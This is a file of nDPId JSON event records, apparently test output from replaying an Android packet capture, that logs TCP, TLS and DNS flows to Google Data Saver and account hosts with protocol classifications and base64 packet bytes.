00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454871636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871636,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8YK4AAHYGIe7Y7yZ4wKgCEAG7gOoEIWijV6QkBaAS6yBQGwAAAgQFZAQCCAqpXP8l\/\/83TQEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454871641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871641,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0E0pAAEAGZVrAqAIQ2O8meIDqAbtXpCQFBCFopIAQAVdoXgAAAQEICv\/\/N1GpXP8l"}
00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871623,"flow_last_seen":1582454871623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871623,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454871623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871623,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8E0lAAEAGZVPAqAIQ2O8meIDqAbtXpCQEAAAAAKAC\/\/9QRAAAAgQFtAQCCAr\/\/zdNAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454871636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871636,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8YK4AAHYGIe7Y7yZ4wKgCEAG7gOoEIWijV6QkBaAS6yBQGwAAAgQFZAQCCAqpXP8l\/\/83TQEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454871641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871641,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0E0pAAEAGZVrAqAIQ2O8meIDqAbtXpCQFBCFopIAQAVdoXgAAAQEICv\/\/N1GpXP8l"}
00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454871676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871676,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrABAAEARCUrAqAIQwKgCAYHYADUALeidI0IBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="}
00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454871677,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871677,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRtlYAAEARPuTAqAIBwKgCEAA1gdgAPR0+I0KBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="}
00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871677,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}}
00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871741,"flow_last_seen":1582454871741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871741,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454871741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871741,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8FotAAEAGoFXAqAIQrNkUSs0iAbsOnCHhAAAAAKAC\/\/+NXgAAAgQFtAQCCAr\/\/zdqAAAAAAEDAwg="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871745,"flow_last_seen":1582454871745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871745,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1582454871745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871745,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8bVhAAEAGDXfAqAIQrcJPco\/wAFDXL1ozAAAAAKAC\/\/+PAwAAAgQFtAQCCAr\/\/zdrAAAAAAEDAwg="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871772,"flow_last_seen":1582454871772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871772,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1582454871772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871772,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CzhAAEAGb5fAqAIQrcJPco\/yAFDC1DxKAAAAAKAC\/\/\/BPgAAAgQFtAQCCAr\/\/zdyAAAAAAEDAwg="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454871781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871781,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8S\/EAAHUGde+s2RRKwKgCEAG7zSLiUVJTDpwh4qAS6yCWYgAAAgQFZAQCCAoTCsRq\/\/83agEDAwg="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1582454871784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871784,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8QWIAAGcGUm2twk9ywKgCEABQj\/AL32zY1y9aNKAS87jv8AAAAgQFlgQCCArQ72G\/\/\/83awEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454871786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871786,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0FoxAAEAGoFzAqAIQrNkUSs0iAbsOnCHi4lFSVIAQAVeungAAAQEICv\/\/N3UTCsRq"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1582454871787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871787,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0bVlAAEAGDX7AqAIQrcJPco\/wAFDXL1o0C99s2YAQAVcQ9wAAAQEICv\/\/N3bQ72G\/"}
00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871741,"flow_last_seen":1582454871741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871741,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454871741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871741,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8FotAAEAGoFXAqAIQrNkUSs0iAbsOnCHhAAAAAKAC\/\/+NXgAAAgQFtAQCCAr\/\/zdqAAAAAAEDAwg="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871745,"flow_last_seen":1582454871745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871745,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1582454871745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871745,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8bVhAAEAGDXfAqAIQrcJPco\/wAFDXL1ozAAAAAKAC\/\/+PAwAAAgQFtAQCCAr\/\/zdrAAAAAAEDAwg="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871772,"flow_last_seen":1582454871772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871772,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1582454871772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871772,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CzhAAEAGb5fAqAIQrcJPco\/yAFDC1DxKAAAAAKAC\/\/\/BPgAAAgQFtAQCCAr\/\/zdyAAAAAAEDAwg="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454871781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871781,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8S\/EAAHUGde+s2RRKwKgCEAG7zSLiUVJTDpwh4qAS6yCWYgAAAgQFZAQCCAoTCsRq\/\/83agEDAwg="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1582454871784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871784,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8QWIAAGcGUm2twk9ywKgCEABQj\/AL32zY1y9aNKAS87jv8AAAAgQFlgQCCArQ72G\/\/\/83awEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454871786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871786,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0FoxAAEAGoFzAqAIQrNkUSs0iAbsOnCHi4lFSVIAQAVeungAAAQEICv\/\/N3UTCsRq"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1582454871787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871787,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0bVlAAEAGDX7AqAIQrcJPco\/wAFDXL1o0C99s2YAQAVcQ9wAAAQEICv\/\/N3bQ72G\/"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1582454871804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871804,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGrB5AAEARCSfAqAIQwKgCAUfLADUAMmcLPGQBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"}
00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1582454871805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871805,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWsEQAAEARRPHAqAIBwKgCEAA1R8sAQmKIPGSBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="}
